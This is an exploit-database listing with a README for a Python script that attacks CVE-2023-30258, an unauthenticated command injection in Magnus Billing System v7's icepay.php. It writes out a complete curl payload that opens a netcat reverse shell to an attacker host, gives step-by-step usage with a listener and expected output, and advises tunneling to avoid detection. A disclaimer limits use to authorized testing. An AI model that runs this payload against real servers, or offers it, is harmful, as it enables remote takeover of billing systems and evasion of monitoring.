Exploit for OS Command Injection in Magnussolution Magnusbilling CVE-2023-30258

Name: Exploit for OS Command Injection in Magnussolution Magnusbilling CVE-2023-30258
Rating: 5 (53 reviews)
2025-03-12 | CVSS 9.8
## https://sploitus.com/exploit?id=82344D7F-45DE-547C-BC1F-87996F370E36
# Magnus Billing System v7 Exploit

This Python script automates the exploitation of a command injection vulnerability in Magnus Billing System v7, specifically in the `icepay.php` script located at `/mbilling/lib/icepay/icepay.php`. The exploit leverages the `democ` parameter to execute arbitrary commands on the target system, ultimately establishing a reverse shell to an attacker-controlled machine.

## Vulnerability Overview

The vulnerability allows unauthenticated command injection via a crafted GET request. The original proof-of-concept (PoC) used the following `curl` command:

```bash
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'
```

This script automates that process, making it configurable via command-line arguments.

## Features

- **Configurable**: Specify the target IP, attacker IP, and port via command-line arguments
- **Simple**: Uses the `requests` library to send the HTTP request with the payload
- **Feedback**: Provides clear output to track the exploit's progress

## Prerequisites

- **Python 3.x**: Ensure Python 3 is installed on your system
- **Requests Library**: Install the `requests` Python module:
  ```bash
  pip install requests
  ```
- **Netcat**: The target system must have `netcat` (`nc`) installed for the reverse shell to work
- **Listener**: Set up a `netcat` listener on the attacker machine to catch the reverse shell
- **Vulnerable Target**: The target must be running Magnus Billing System v7 with the vulnerable `icepay.php` script accessible

## Usage

### Setup

1. **Clone or Download**: Save the script as `exploit.py`
2. **Set Up Listener**: On your attacker machine, start a `netcat` listener:
   ```bash
   nc -lvnp <PORT>
   ```
   Replace `<PORT>` with your chosen port (e.g., `443`)

### Running the Exploit

```bash
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
```

**Parameters:**
- `-t, --target`: IP address of the target Magnus Billing System
- `-a, --attacker`: Your IP address to receive the reverse shell
- `-p, --port`: Port on your machine for the reverse shell

### Example

```bash
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443
```

**Expected Output:**
```
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
```

4. **Catch the Shell**: Switch to your `netcat` listener to interact with the reverse shell if successful

## Technical Notes

- **Payload Type**: The script uses a FIFO-based reverse shell (`mkfifo`) with `netcat`
- **Error Handling**: Basic checks for network errors and invalid ports are included
- **Debugging**: To inspect the server's response, uncomment `print(response.text)` in the `exploit()` function
- **Alternative Payloads**: The script can be modified to use different reverse shell payloads if needed

## Troubleshooting

- If the connection fails, verify that:
  - The target system has `netcat` installed
  - No firewall is blocking the connection
  - The correct ports are being used
  - The target has not been patched

## Security Considerations

- Consider using SSH tunneling or a VPN when using this exploit to avoid detection
- The payload might trigger security monitoring systems

## Disclaimer

This tool is provided for **educational and security testing purposes only**. Use it only on systems you have explicit permission to test. Unauthorized use against systems you do not own or have consent to test is illegal and unethical. The author is not responsible for any misuse or damage caused by this script.

## License

This project is released under the MIT License. Feel free to modify and distribute it as needed, keeping the disclaimer intact.

## Contributing

Contributions, bug reports, and feature requests are welcome. Please feel free to submit a pull request or open an issue.